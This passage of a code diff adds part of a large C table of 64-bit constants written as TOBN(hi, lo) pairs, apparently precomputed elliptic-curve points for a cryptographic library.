+     TOBN(0xad83fef0, 0x8e7341f7), TOBN(0x643f23a0, 0x3a63115c),
+     TOBN(0xd38a78ab, 0xe65ab743), TOBN(0xbf7c75b1, 0x35edc89c),
+     TOBN(0x3dd8752e, 0x530df568), TOBN(0xf85c4a76, 0xe308c682),
+     TOBN(0x4c9955b2, 0xe68acf37), TOBN(0xa544df3d, 0xab32af85),
+     TOBN(0x4b8ec3f5, 0xa25cf493), TOBN(0x4d8f2764, 0x1a622feb),
+     TOBN(0x7bb4f7aa, 0xf0dcbc49), TOBN(0x7de551f9, 0x70bbb45b),
+     TOBN(0xcfd0f3e4, 0x9f2ca2e5), TOBN(0xece58709, 0x1f5c76ef),
+     TOBN(0x32920edd, 0x167d79ae), TOBN(0x039df8a2, 0xfa7d7ec1),
+     TOBN(0xf46206c0, 0xbb30af91), TOBN(0x1ff5e2f5, 0x22676b59),
+     TOBN(0x11f4a039, 0x6ea51d66), TOBN(0x506c1445, 0x807d7a26),
+     TOBN(0x60da5705, 0x755a9b24), TOBN(0x8fc8cc32, 0x1f1a319e),
+     TOBN(0x83642d4d, 0x9433d67d), TOBN(0x7fa5cb8f, 0x6a7dd296),
+     TOBN(0x576591db, 0x9b7bde07), TOBN(0x13173d25, 0x419716fb),
+     TOBN(0xea30599d, 0xd5b340ff), TOBN(0xfc6b5297, 0xb0fe76c5),
+     TOBN(0x1c6968c8, 0xab8f5adc), TOBN(0xf723c7f5, 0x901c928d),
+     TOBN(0x4203c321, 0x9773d402), TOBN(0xdf7c6aa3, 0x1b51dd47),
+     TOBN(0x3d49e37a, 0x552be23c), TOBN(0x57febee8, 0x0b5a6e87),
+     TOBN(0xc5ecbee4, 0x7bd8e739), TOBN(0x79d44994, 0xae63bf75),
+     TOBN(0x168bd00f, 0x38fb8923), TOBN(0x75d48ee4, 0xd0533130),
+     TOBN(0x554f77aa, 0xdb5cdf33), TOBN(0x3396e896, 0x3c696769),
+     TOBN(0x2fdddbf2, 0xd3fd674e), TOBN(0xbbb8f6ee, 0x99d0e3e5),
+     TOBN(0x51b90651, 0xcbae2f70), TOBN(0xefc4bc05, 0x93aaa8eb),
+     TOBN(0x8ecd8689, 0xdd1df499), TOBN(0x1aee99a8, 0x22f367a5),
+     TOBN(0x95d485b9, 0xae8274c5), TOBN(0x6c14d445, 0x7d30b39c),
+     TOBN(0xbafea90b, 0xbcc1ef81), TOBN(0x7c5f317a, 0xa459a2ed),
+     TOBN(0x01211075, 0x4ef44227), TOBN(0xa17bed6e, 0xdc20f496),
+     TOBN(0x0cdfe424, 0x819853cd), TOBN(0x13793298, 0xf71e2ce7),
+     TOBN(0x3c1f3078, 0xdbbe307b), TOBN(0x6dd1c20e, 0x76ee9936),
+     TOBN(0x23ee4b57, 0x423caa20), TOBN(0x4ac3793b, 0x8efb840e),
+     TOBN(0x934438eb, 0xed1f8ca0), TOBN(0x3e546658, 0x4ebb25a2),
+     TOBN(0xc415af0e, 0xc069896f), TOBN(0xc13eddb0, 0x9a5aa43d),
+     TOBN(0x7a04204f, 0xd49eb8f6), TOBN(0xd0d5bdfc, 0xd74f1670),
+     TOBN(0x3697e286, 0x56fc0558), TOBN(0x10207371, 0x01cebade),
+     TOBN(0x5f87e690, 0x0647a82b), TOBN(0x908e0ed4, 0x8f40054f),
+     TOBN(0xa9f633d4, 0x79853803), TOBN(0x8ed13c9a, 0x4a28b252),
+     TOBN(0x3e2ef676, 0x1f460f64), TOBN(0x53930b9b, 0x36d06336),
+     TOBN(0x347073ac, 0x8fc4979b), TOBN(0x84380e0e, 0x5ecd5597),
+     TOBN(0xe3b22c6b, 0xc4fe3c39), TOBN(0xba4a8153, 0x6c7bebdf),
+     TOBN(0xf23ab6b7, 0x25693459), TOBN(0x53bc3770, 0x14922b11),
+     TOBN(0x4645c8ab, 0x5afc60db), TOBN(0xaa022355, 0x20b9f2a3),
+     TOBN(0x52a2954c, 0xce0fc507), TOBN(0x8c2731bb, 0x7ce1c2e7),
+     TOBN(0xf39608ab, 0x18a0339d), TOBN(0xac7a658d, 0x3735436c),
+     TOBN(0xb22c2b07, 0xcd992b4f), TOBN(0x4e83daec, 0xf40dcfd4),
+     TOBN(0x8a34c7be, 0x2f39ea3e), TOBN(0xef0c005f, 0xb0a56d2e),
+     TOBN(0x62731f6a, 0x6edd8038), TOBN(0x5721d740, 0x4e3cb075),
+     TOBN(0x1ea41511, 0xfbeeee1b), TOBN(0xd1ef5e73, 0xef1d0c05),
+     TOBN(0x42feefd1, 0x73c07d35), TOBN(0xe530a00a, 0x8a329493),
+     TOBN(0x5d55b7fe, 0xf15ebfb0), TOBN(0x549de03c, 0xd322491a),
+     TOBN(0xf7b5f602, 0x745b3237), TOBN(0x3632a3a2, 0x1ab6e2b6),
+     TOBN(0x0d3bba89, 0x0ef59f78), TOBN(0x0dfc6443, 0xc9e52b9a),
+     TOBN(0x1dc79699, 0x72631447), TOBN(0xef033917, 0xb3be20b1),
+     TOBN(0x0c92735d, 0xb1383948), TOBN(0xc1fc29a2, 0xc0dd7d7d),
+     TOBN(0x6485b697, 0x403ed068), TOBN(0x13bfaab3, 0xaac93bdc),
+     TOBN(0x410dc6a9, 0x0deeaf52), TOBN(0xb003fb02, 0x4c641c15),
+     TOBN(0x1384978c, 0x5bc504c4), TOBN(0x37640487, 0x864a6a77),
+     TOBN(0x05991bc6, 0x222a77da), TOBN(0x62260a57, 0x5e47eb11),
+     TOBN(0xc7af6613, 0xf21b432c), TOBN(0x22f3acc9, 0xab4953e9),
+     TOBN(0x52934922, 0x8e41d155), TOBN(0x4d024568, 0x3ac059ef),
+     TOBN(0xb0201755, 0x4d884411), TOBN(0xce8055cf, 0xa59a178f),
+     TOBN(0xcd77d1af, 0xf6204549), TOBN(0xa0a00a3e, 0xc7066759),
+     TOBN(0x471071ef, 0x0272c229), TOBN(0x009bcf6b, 0xd3c4b6b0),
+     TOBN(0x2a2638a8, 0x22305177), TOBN(0xd51d59df, 0x41645bbf),
+     TOBN(0xa81142fd, 0xc0a7a3c0), TOBN(0xa17eca6d, 0x4c7063ee),
+     TOBN(0x0bb887ed, 0x60d9dcec), TOBN(0xd6d28e51, 0x20ad2455),
+     TOBN(0xebed6308, 0xa67102ba), TOBN(0x042c3114, 0x8bffa408),
+     TOBN(0xfd099ac5, 0x8aa68e30), TOBN(0x7a6a3d7c, 0x1483513e),
+     TOBN(0xffcc6b75, 0xba2d8f0c), TOBN(0x54dacf96, 0x1e78b954),
+     TOBN(0xf645696f, 0xa4a9af89), TOBN(0x3a411940, 0x06ac98ec),
+     TOBN(0x41b8b3f6, 0x22a67a20), TOBN(0x2d0b1e0f, 0x99dec626),
+     TOBN(0x27c89192, 0x40be34e8), TOBN(0xc7162b37, 0x91907f35),
+     TOBN(0x90188ec1, 0xa956702b), TOBN(0xca132f7d, 0xdf93769c),
+     TOBN(0x3ece44f9, 0x0e2025b4), TOBN(0x67aaec69, 0x0c62f14c),
+     TOBN(0xad741418, 0x22e3cc11), TOBN(0xcf9b75c3, 0x7ff9a50e),
+     TOBN(0x02fa2b16, 0x4d348272), TOBN(0xbd99d61a, 0x9959d56d),
+     TOBN(0xbc4f19db, 0x18762916), TOBN(0xcc7cce50, 0x49c1ac80),
+     TOBN(0x4d59ebaa, 0xd846bd83), TOBN(0x8775a9dc, 0xa9202849),
+     TOBN(0x07ec4ae1, 0x6e1f4ca9), TOBN(0x27eb5875, 0xba893f11),
+     TOBN(0x00284d51, 0x662cc565), TOBN(0x82353a6b, 0x0db4138d),
+     TOBN(0xd9c7aaaa, 0xaa32a594), TOBN(0xf5528b5e, 0xa5669c47),
+     TOBN(0xf3220231, 0x2f23c5ff), TOBN(0xe3e8147a, 0x6affa3a1),
+     TOBN(0xfb423d5c, 0x202ddda0), TOBN(0x3d6414ac, 0x6b871bd4),
+     TOBN(0x586f82e1, 0xa51a168a), TOBN(0xb712c671, 0x48ae5448),
+     TOBN(0x9a2e4bd1, 0x76233eb8), TOBN(0x0188223a, 0x78811ca9),
+     TOBN(0x553c5e21, 0xf7c18de1), TOBN(0x7682e451, 0xb27bb286),
+     TOBN(0x3ed036b3, 0x0e51e929), TOBN(0xf487211b, 0xec9cb34f),
+     TOBN(0x0d094277, 0x0c24efc8), TOBN(0x0349fd04, 0xbef737a4),
+     TOBN(0x6d1c9dd2, 0x514cdd28), TOBN(0x29c135ff, 0x30da9521),
+     TOBN(0xea6e4508, 0xf78b0b6f), TOBN(0x176f5dd2, 0x678c143c),
+     TOBN(0x08148418, 0x4be21e65), TOBN(0x27f7525c, 0xe7df38c4),
+     TOBN(0x1fb70e09, 0x748ab1a4), TOBN(0x9cba50a0, 0x5efe4433),
+     TOBN(0x7846c7a6, 0x15f75af2), TOBN(0x2a7c2c57, 0x5ee73ea8),
+     TOBN(0x42e566a4, 0x3f0a449a), TOBN(0x45474c3b, 0xad90fc3d),
+     TOBN(0x7447be3d, 0x8b61d057), TOBN(0x3e9d1cf1, 0x3a4ec092),
+     TOBN(0x1603e453, 0xf380a6e6), TOBN(0x0b86e431, 0x9b1437c2),
+     TOBN(0x7a4173f2, 0xef29610a), TOBN(0x8fa729a7, 0xf03d57f7),
+     TOBN(0x3e186f6e, 0x6c9c217e), TOBN(0xbe1d3079, 0x91919524),
+     TOBN(0x92a62a70, 0x153d4fb1), TOBN(0x32ed3e34, 0xd68c2f71),
+     TOBN(0xd785027f, 0x9eb1a8b7), TOBN(0xbc37eb77, 0xc5b22fe8),
+     TOBN(0x466b34f0, 0xb9d6a191), TOBN(0x008a89af, 0x9a05f816),
+     TOBN(0x19b028fb, 0x7d42c10a), TOBN(0x7fe8c92f, 0x49b3f6b8),
+     TOBN(0x58907cc0, 0xa5a0ade3), TOBN(0xb3154f51, 0x559d1a7c),
+     TOBN(0x5066efb6, 0xd9790ed6), TOBN(0xa77a0cbc, 0xa6aa793b),
+     TOBN(0x1a915f3c, 0x223e042e), TOBN(0x1c5def04, 0x69c5874b),
+     TOBN(0x0e830078, 0x73b6c1da), TOBN(0x55cf85d2, 0xfcd8557a),
+     TOBN(0x0f7c7c76, 0x0460f3b1), TOBN(0x87052acb, 0x46e58063),
+     TOBN(0x09212b80, 0x907eae66), TOBN(0x3cb068e0, 0x4d721c89),
+     TOBN(0xa87941ae, 0xdd45ac1c), TOBN(0xde8d5c0d, 0x0daa0dbb),
+     TOBN(0xda421fdc, 0xe3502e6e), TOBN(0xc8944201, 0x4d89a084),
+     TOBN(0x7307ba5e, 0xf0c24bfb), TOBN(0xda212beb, 0x20bde0ef),
+     TOBN(0xea2da24b, 0xf82ce682), TOBN(0x058d3816, 0x07f71fe4),
+     TOBN(0x35a02462, 0x5ffad8de), TOBN(0xcd7b05dc, 0xaadcefab),
+     TOBN(0xd442f8ed, 0x1d9f54ec), TOBN(0x8be3d618, 0xb2d3b5ca),
+     TOBN(0xe2220ed0, 0xe06b2ce2), TOBN(0x82699a5f, 0x1b0da4c0),
+     TOBN(0x3ff106f5, 0x71c0c3a7), TOBN(0x8f580f5a, 0x0d34180c),
+     TOBN(0x4ebb120e, 0x22d7d375), TOBN(0x5e5782cc, 0xe9513675),
+     TOBN(0x2275580c, 0x99c82a70), TOBN(0xe8359fbf, 0x15ea8c4c),
+     TOBN(0x53b48db8, 0x7b415e70), TOBN(0xaacf2240, 0x100c6014),
+     TOBN(0x9faaccf5, 0xe4652f1d), TOBN(0xbd6fdd2a, 0xd56157b2),
+     TOBN(0xa4f4fb1f, 0x6261ec50), TOBN(0x244e55ad, 0x476bcd52),
+     TOBN(0x881c9305, 0x047d320b), TOBN(0x1ca983d5, 0x6181263f),
+     TOBN(0x354e9a44, 0x278fb8ee), TOBN(0xad2dbc0f, 0x396e4964),
+     TOBN(0x723f3aa2, 0x9268b3de), TOBN(0x0d1ca29a, 0xe6e0609a),
+     TOBN(0x794866aa, 0x6cf44252), TOBN(0x0b59f3e3, 0x01af87ed),
+     TOBN(0xe234e5ff, 0x7f4a6c51), TOBN(0xa8768fd2, 0x61dc2f7e),
+     TOBN(0xdafc7332, 0x0a94d81f), TOBN(0xd7f84282, 0x06938ce1),
+     TOBN(0xae0b3c0e, 0x0546063e), TOBN(0x7fbadcb2, 0x5d61abc6),
+     TOBN(0xd5d7a2c9, 0x369ac400), TOBN(0xa5978d09, 0xae67d10c),
+     TOBN(0x290f211e, 0x4f85eaac), TOBN(0xe61e2ad1, 0xfacac681),
+     TOBN(0xae125225, 0x388384cd), TOBN(0xa7fb68e9, 0xccfde30f),
+     TOBN(0x7a59b936, 0x3daed4c2), TOBN(0x80a9aa40, 0x2606f789),
+     TOBN(0xb40c1ea5, 0xf6a6d90a), TOBN(0x948364d3, 0x514d5885),
+     TOBN(0x062ebc60, 0x70985182), TOBN(0xa6db5b0e, 0x33310895),
+     TOBN(0x64a12175, 0xe329c2f5), TOBN(0xc5f25bd2, 0x90ea237e),
+     TOBN(0x7915c524, 0x2d0a4c23), TOBN(0xeb5d26e4, 0x6bb3cc52),
+     TOBN(0x369a9116, 0xc09e2c92), TOBN(0x0c527f92, 0xcf182cf8),
+     TOBN(0x9e591938, 0x2aede0ac), TOBN(0xb2922208, 0x6cc34939),
+     TOBN(0x3c9d8962, 0x99a34361), TOBN(0x3c81836d, 0xc1905fe6),
+     TOBN(0x4bfeb57f, 0xa001ec5a), TOBN(0xe993f5bb, 0xa0dc5dba),
+     TOBN(0x47884109, 0x724a1380), TOBN(0x8a0369ab, 0x32fe9a04),
+     TOBN(0xea068d60, 0x8c927db8), TOBN(0xbf5f37cf, 0x94655741),
+     TOBN(0x47d402a2, 0x04b6c7ea), TOBN(0x4551c295, 0x6af259cb),
+     TOBN(0x698b71e7, 0xed77ee8b), TOBN(0xbddf7bd0, 0xf309d5c7),
+     TOBN(0x6201c22c, 0x34e780ca), TOBN(0xab04f7d8, 0x4c295ef4),
+     TOBN(0x1c947294, 0x4313a8ce), TOBN(0xe532e4ac, 0x92ca4cfe),
+     TOBN(0x89738f80, 0xd0a7a97a), TOBN(0xec088c88, 0xa580fd5b),
+     TOBN(0x612b1ecc, 0x42ce9e51), TOBN(0x8f9840fd, 0xb25fdd2a),
+     TOBN(0x3cda78c0, 0x01e7f839), TOBN(0x546b3d3a, 0xece05480),
+     TOBN(0x271719a9, 0x80d30916), TOBN(0x45497107, 0x584c20c4),
+     TOBN(0xaf8f9478, 0x5bc78608), TOBN(0x28c7d484, 0x277e2a4c),
+     TOBN(0xfce01767, 0x88a2ffe4), TOBN(0xdc506a35, 0x28e169a5),
+     TOBN(0x0ea10861, 0x7af9c93a), TOBN(0x1ed24361, 0x03fa0e08),
+     TOBN(0x96eaaa92, 0xa3d694e7), TOBN(0xc0f43b4d, 0xef50bc74),
+     TOBN(0xce6aa58c, 0x64114db4), TOBN(0x8218e8ea, 0x7c000fd4),
+     TOBN(0xac815dfb, 0x185f8844), TOBN(0xcd7e90cb, 0x1557abfb),
+     TOBN(0x23d16655, 0xafbfecdf), TOBN(0x80f3271f, 0x085cac4a),
+     TOBN(0x7fc39aa7, 0xd0e62f47), TOBN(0x88d519d1, 0x460a48e5),
+     TOBN(0x59559ac4, 0xd28f101e), TOBN(0x7981d9e9, 0xca9ae816),
+     TOBN(0x5c38652c, 0x9ac38203), TOBN(0x86eaf87f, 0x57657fe5),
+     TOBN(0x568fc472, 0xe21f5416), TOBN(0x2afff39c, 0xe7e597b5),
+     TOBN(0x3adbbb07, 0x256d4eab), TOBN(0x22598692, 0x8285ab89),
+     TOBN(0x35f8112a, 0x041caefe), TOBN(0x95df02e3, 0xa5064c8b),
+     TOBN(0x4d63356e, 0xc7004bf3), TOBN(0x230a08f4, 0xdb83c7de),
+     TOBN(0xca27b270, 0x8709a7b7), TOBN(0x0d1c4cc4, 0xcb9abd2d),
+     TOBN(0x8a0bc66e, 0x7550fee8), TOBN(0x369cd4c7, 0x9cf7247e),
+     TOBN(0x75562e84, 0x92b5b7e7), TOBN(0x8fed0da0, 0x5802af7b),
+     TOBN(0x6a7091c2, 0xe48fb889), TOBN(0x26882c13, 0x7b8a9d06),
+     TOBN(0xa2498663, 0x1b82a0e2), TOBN(0x844ed736, 0x3518152d),
+     TOBN(0x282f476f, 0xd86e27c7), TOBN(0xa04edaca, 0x04afefdc),
+     TOBN(0x8b256ebc, 0x6119e34d), TOBN(0x56a413e9, 0x0787d78b),}
+    ,
+    {TOBN(0x82ee061d, 0x5a74be50), TOBN(0xe41781c4, 0xdea16ff5),
+     TOBN(0xe0b0c81e, 0x99bfc8a2), TOBN(0x624f4d69, 0x0b547e2d),
+     TOBN(0x3a83545d, 0xbdcc9ae4), TOBN(0x2573dbb6, 0x409b1e8e),
+     TOBN(0x482960c4, 0xa6c93539), TOBN(0xf01059ad, 0x5ae18798),
+     TOBN(0x715c9f97, 0x3112795f), TOBN(0xe8244437, 0x984e6ee1),
+     TOBN(0x55cb4858, 0xecb66bcd), TOBN(0x7c136735, 0xabaffbee),
+     TOBN(0x54661595, 0x5dbec38e), TOBN(0x51c0782c, 0x388ad153),
+     TOBN(0x9ba4c53a, 0xc6e0952f), TOBN(0x27e6782a, 0x1b21dfa8),
+     TOBN(0x682f903d, 0x4ed2dbc2), TOBN(0x0eba59c8, 0x7c3b2d83),
+     TOBN(0x8e9dc84d, 0x9c7e9335), TOBN(0x5f9b21b0, 0x0eb226d7),
+     TOBN(0xe33bd394, 0xaf267bae), TOBN(0xaa86cc25, 0xbe2e15ae),
+     TOBN(0x4f0bf67d, 0x6a8ec500), TOBN(0x5846aa44, 0xf9630658),
+     TOBN(0xfeb09740, 0xe2c2bf15), TOBN(0x627a2205, 0xa9e99704),
+     TOBN(0xec8d73d0, 0xc2fbc565), TOBN(0x223eed8f, 0xc20c8de8),
+     TOBN(0x1ee32583, 0xa8363b49), TOBN(0x1a0b6cb9, 0xc9c2b0a6),
+     TOBN(0x49f7c3d2, 0x90dbc85c), TOBN(0xa8dfbb97, 0x1ef4c1ac),
+     TOBN(0xafb34d4c, 0x65c7c2ab), TOBN(0x1d4610e7, 0xe2c5ea84),
+     TOBN(0x893f6d1b, 0x973c4ab5), TOBN(0xa3cdd7e9, 0x945ba5c4),
+     TOBN(0x60514983, 0x064417ee), TOBN(0x1459b23c, 0xad6bdf2b),
+     TOBN(0x23b2c341, 0x5cf726c3), TOBN(0x3a829635, 0x32d6354a),
+     TOBN(0x294f901f, 0xab192c18), TOBN(0xec5fcbfe, 0x7030164f),
+     TOBN(0xe2e2fcb7, 0xe2246ba6), TOBN(0x1e7c88b3, 0x221a1a0c),
+     TOBN(0x72c7dd93, 0xc92d88c5), TOBN(0x41c2148e, 0x1106fb59),
+     TOBN(0x547dd4f5, 0xa0f60f14), TOBN(0xed9b52b2, 0x63960f31),
+     TOBN(0x6c8349eb, 0xb0a5b358), TOBN(0xb154c5c2, 0x9e7e2ed6),
+     TOBN(0xcad5eccf, 0xeda462db), TOBN(0xf2d6dbe4, 0x2de66b69),
+     TOBN(0x426aedf3, 0x8665e5b2), TOBN(0x488a8513, 0x7b7f5723),
+     TOBN(0x15cc43b3, 0x8bcbb386), TOBN(0x27ad0af3, 0xd791d879),
+     TOBN(0xc16c236e, 0x846e364f), TOBN(0x7f33527c, 0xdea50ca0),
+     TOBN(0xc4810775, 0x0926b86d), TOBN(0x6c2a3609, 0x0598e70c),
+     TOBN(0xa6755e52, 0xf024e924), TOBN(0xe0fa07a4, 0x9db4afca),
+     TOBN(0x15c3ce7d, 0x66831790), TOBN(0x5b4ef350, 0xa6cbb0d6),
+     TOBN(0x2c4aafc4, 0xb6205969), TOBN(0x42563f02, 0xf6c7854f),
+     TOBN(0x016aced5, 0x1d983b48), TOBN(0xfeb356d8, 0x99949755),
+     TOBN(0x8c2a2c81, 0xd1a39bd7), TOBN(0x8f44340f, 0xe6934ae9),
+     TOBN(0x148cf91c, 0x447904da), TOBN(0x7340185f, 0x0f51a926),
+     TOBN(0x2f8f00fb, 0x7409ab46), TOBN(0x057e78e6, 0x80e289b2),
+     TOBN(0x03e5022c, 0xa888e5d1), TOBN(0x3c87111a, 0x9dede4e2),
+     TOBN(0x5b9b0e1c, 0x7809460b), TOBN(0xe751c852, 0x71c9abc7),
+     TOBN(0x8b944e28, 0xc7cc1dc9), TOBN(0x4f201ffa, 0x1d3cfa08),
+     TOBN(0x02fc905c, 0x3e6721ce), TOBN(0xd52d70da, 0xd0b3674c),
+     TOBN(0x5dc2e5ca, 0x18810da4), TOBN(0xa984b273, 0x5c69dd99),
+     TOBN(0x63b92527, 0x84de5ca4), TOBN(0x2f1c9872, 0xc852dec4),
+     TOBN(0x18b03593, 0xc2e3de09), TOBN(0x19d70b01, 0x9813dc2f),
+     TOBN(0x42806b2d, 0xa6dc1d29), TOBN(0xd3030009, 0xf871e144),
+     TOBN(0xa1feb333, 0xaaf49276), TOBN(0xb5583b9e, 0xc70bc04b),
+     TOBN(0x1db0be78, 0x95695f20), TOBN(0xfc841811, 0x89d012b5),
+     TOBN(0x6409f272, 0x05f61643), TOBN(0x40d34174, 0xd5883128),
+     TOBN(0xd79196f5, 0x67419833), TOBN(0x6059e252, 0x863b7b08),
+     TOBN(0x84da1817, 0x1c56700c), TOBN(0x5758ee56, 0xb28d3ec4),
+     TOBN(0x7da2771d, 0x013b0ea6), TOBN(0xfddf524b, 0x54c5e9b9),
+     TOBN(0x7df4faf8, 0x24305d80), TOBN(0x58f5c1bf, 0x3a97763f),
+     TOBN(0xa5af37f1, 0x7c696042), TOBN(0xd4cba22c, 0x4a2538de),
+     TOBN(0x211cb995, 0x9ea42600), TOBN(0xcd105f41, 0x7b069889),
+     TOBN(0xb1e1cf19, 0xddb81e74), TOBN(0x472f2d89, 0x5157b8ca),
+     TOBN(0x086fb008, 0xee9db885), TOBN(0x365cd570, 0x0f26d131),
+     TOBN(0x284b02bb, 0xa2be7053), TOBN(0xdcbbf7c6, 0x7ab9a6d6),
+     TOBN(0x4425559c, 0x20f7a530), TOBN(0x961f2dfa, 0x188767c8),
+     TOBN(0xe2fd9435, 0x70dc80c4), TOBN(0x104d6b63, 0xf0784120),
+     TOBN(0x7f592bc1, 0x53567122), TOBN(0xf6bc1246, 0xf688ad77),
+     TOBN(0x05214c05, 0x0f15dde9), TOBN(0xa47a76a8, 0x0d5f2b82),
+     TOBN(0xbb254d30, 0x62e82b62), TOBN(0x11a05fe0, 0x3ec955ee),
+     TOBN(0x7eaff46e, 0x9d529b36), TOBN(0x55ab1301, 0x8f9e3df6),
+     TOBN(0xc463e371, 0x99317698), TOBN(0xfd251438, 0xccda47ad),
+     TOBN(0xca9c3547, 0x23d695ea), TOBN(0x48ce626e, 0x16e589b5),
+     TOBN(0x6b5b64c7, 0xb187d086), TOBN(0xd02e1794, 0xb2207948),
+     TOBN(0x8b58e98f, 0x7198111d), TOBN(0x90ca6305, 0xdcf9c3cc),
+     TOBN(0x5691fe72, 0xf34089b0), TOBN(0x60941af1, 0xfc7c80ff),
+     TOBN(0xa09bc0a2, 0x22eb51e5), TOBN(0xc0bb7244, 0xaa9cf09a),
+     TOBN(0x36a8077f, 0x80159f06), TOBN(0x8b5c989e, 0xdddc560e),
+     TOBN(0x19d2f316, 0x512e1f43), TOBN(0x02eac554, 0xad08ff62),
+     TOBN(0x012ab84c, 0x07d20b4e), TOBN(0x37d1e115, 0xd6d4e4e1),
+     TOBN(0xb6443e1a, 0xab7b19a8), TOBN(0xf08d067e, 0xdef8cd45),
+     TOBN(0x63adf3e9, 0x685e03da), TOBN(0xcf15a10e, 0x4792b916),
+     TOBN(0xf44bcce5, 0xb738a425), TOBN(0xebe131d5, 0x9636b2fd),
+     TOBN(0x94068841, 0x7850d605), TOBN(0x09684eaa, 0xb40d749d),
+     TOBN(0x8c3c669c, 0x72ba075b), TOBN(0x89f78b55, 0xba469015),
+     TOBN(0x5706aade, 0x3e9f8ba8), TOBN(0x6d8bd565, 0xb32d7ed7),
+     TOBN(0x25f4e63b, 0x805f08d6), TOBN(0x7f48200d, 0xc3bcc1b5),
+     TOBN(0x4e801968, 0xb025d847), TOBN(0x74afac04, 0x87cbe0a8),
+     TOBN(0x43ed2c2b, 0x7e63d690), TOBN(0xefb6bbf0, 0x0223cdb8),
+     TOBN(0x4fec3cae, 0x2884d3fe), TOBN(0x065ecce6, 0xd75e25a4),
+     TOBN(0x6c2294ce, 0x69f79071), TOBN(0x0d9a8e5f, 0x044b8666),
+     TOBN(0x5009f238, 0x17b69d8f), TOBN(0x3c29f8fe, 0xc5dfdaf7),
+     TOBN(0x9067528f, 0xebae68c4), TOBN(0x5b385632, 0x30c5ba21),
+     TOBN(0x540df119, 0x1fdd1aec), TOBN(0xcf37825b, 0xcfba4c78),
+     TOBN(0x77eff980, 0xbeb11454), TOBN(0x40a1a991, 0x60c1b066),
+     TOBN(0xe8018980, 0xf889a1c7), TOBN(0xb9c52ae9, 0x76c24be0),
+     TOBN(0x05fbbcce, 0x45650ef4), TOBN(0xae000f10, 0x8aa29ac7),
+     TOBN(0x884b7172, 0x4f04c470), TOBN(0x7cd4fde2, 0x19bb5c25),
+     TOBN(0x6477b22a, 0xe8840869), TOBN(0xa8868859, 0x5fbd0686),
+     TOBN(0xf23cc02e, 0x1116dfba), TOBN(0x76cd563f, 0xd87d7776),
+     TOBN(0xe2a37598, 0xa9d82abf), TOBN(0x5f188ccb, 0xe6c170f5),
+     TOBN(0x81682200, 0x5066b087), TOBN(0xda22c212, 0xc7155ada),
+     TOBN(0x151e5d3a, 0xfbddb479), TOBN(0x4b606b84, 0x6d715b99),
+     TOBN(0x4a73b54b, 0xf997cb2e), TOBN(0x9a1bfe43, 0x3ecd8b66),
+     TOBN(0x1c312809, 0x2a67d48a), TOBN(0xcd6a671e, 0x031fa9e2),
+     TOBN(0xbec3312a, 0x0e43a34a), TOBN(0x1d935639, 0x55ef47d3),
+     TOBN(0x5ea02489, 0x8fea73ea), TOBN(0x8247b364, 0xa035afb2),
+     TOBN(0xb58300a6, 0x5265b54c), TOBN(0x3286662f, 0x722c7148),
+     TOBN(0xb77fd76b, 0xb4ec4c20), TOBN(0xf0a12fa7, 0x0f3fe3fd),
+     TOBN(0xf845bbf5, 0x41d8c7e8), TOBN(0xe4d969ca, 0x5ec10aa8),
+     TOBN(0x4c0053b7, 0x43e232a3), TOBN(0xdc7a3fac, 0x37f8a45a),
+     TOBN(0x3c4261c5, 0x20d81c8f), TOBN(0xfd4b3453, 0xb00eab00),
+     TOBN(0x76d48f86, 0xd36e3062), TOBN(0x626c5277, 0xa143ff02),
+     TOBN(0x538174de, 0xaf76f42e), TOBN(0x2267aa86, 0x6407ceac),
+     TOBN(0xfad76351, 0x72e572d5), TOBN(0xab861af7, 0xba7330eb),
+     TOBN(0xa0a1c8c7, 0x418d8657), TOBN(0x988821cb, 0x20289a52),
+     TOBN(0x79732522, 0xcccc18ad), TOBN(0xaadf3f8d, 0xf1a6e027),
+     TOBN(0xf7382c93, 0x17c2354d), TOBN(0x5ce1680c, 0xd818b689),
+     TOBN(0x359ebbfc, 0xd9ecbee9), TOBN(0x4330689c, 0x1cae62ac),
+     TOBN(0xb55ce5b4, 0xc51ac38a), TOBN(0x7921dfea, 0xfe238ee8),
+     TOBN(0x3972bef8, 0x271d1ca5), TOBN(0x3e423bc7, 0xe8aabd18),
+     TOBN(0x57b09f3f, 0x44a3e5e3), TOBN(0x5da886ae, 0x7b444d66),
+     TOBN(0x68206634, 0xa9964375), TOBN(0x356a2fa3, 0x699cd0ff),
+     TOBN(0xaf0faa24, 0xdba515e9), TOBN(0x536e1f5c, 0xb321d79a),
+     TOBN(0xd3b9913a, 0x5c04e4ea), TOBN(0xd549dcfe, 0xd6f11513),
+     TOBN(0xee227bf5, 0x79fd1d94), TOBN(0x9f35afee, 0xb43f2c67),
+     TOBN(0xd2638d24, 0xf1314f53), TOBN(0x62baf948, 0xcabcd822),
+     TOBN(0x5542de29, 0x4ef48db0), TOBN(0xb3eb6a04, 0xfc5f6bb2),
+     TOBN(0x23c110ae, 0x1208e16a), TOBN(0x1a4d15b5, 0xf8363e24),
+     TOBN(0x30716844, 0x164be00b), TOBN(0xa8e24824, 0xf6f4690d),
+     TOBN(0x548773a2, 0x90b170cf), TOBN(0xa1bef331, 0x42f191f4),
+     TOBN(0x70f418d0, 0x9247aa97), TOBN(0xea06028e, 0x48be9147),
+     TOBN(0xe13122f3, 0xdbfb894e), TOBN(0xbe9b79f6, 0xce274b18),
+     TOBN(0x85a49de5, 0xca58aadf), TOBN(0x24957758, 0x11487351),
+     TOBN(0x111def61, 0xbb939099), TOBN(0x1d6a974a, 0x26d13694),
+     TOBN(0x4474b4ce, 0xd3fc253b), TOBN(0x3a1485e6, 0x4c5db15e),
+     TOBN(0xe79667b4, 0x147c15b4), TOBN(0xe34f553b, 0x7bc61301),
+     TOBN(0x032b80f8, 0x17094381), TOBN(0x55d8bafd, 0x723eaa21),
+     TOBN(0x5a987995, 0xf1c0e74e), TOBN(0x5a9b292e, 0xebba289c),
+     TOBN(0x413cd4b2, 0xeb4c8251), TOBN(0x98b5d243, 0xd162db0a),
+     TOBN(0xbb47bf66, 0x68342520), TOBN(0x08d68949, 0xbaa862d1),
+     TOBN(0x11f349c7, 0xe906abcd), TOBN(0x454ce985, 0xed7bf00e),
+     TOBN(0xacab5c9e, 0xb55b803b), TOBN(0xb03468ea, 0x31e3c16d),
+     TOBN(0x5c24213d, 0xd273bf12), TOBN(0x211538eb, 0x71587887),
+     TOBN(0x198e4a2f, 0x731dea2d), TOBN(0xd5856cf2, 0x74ed7b2a),
+     TOBN(0x86a632eb, 0x13a664fe), TOBN(0x932cd909, 0xbda41291),
+     TOBN(0x850e95d4, 0xc0c4ddc0), TOBN(0xc0f422f8, 0x347fc2c9),
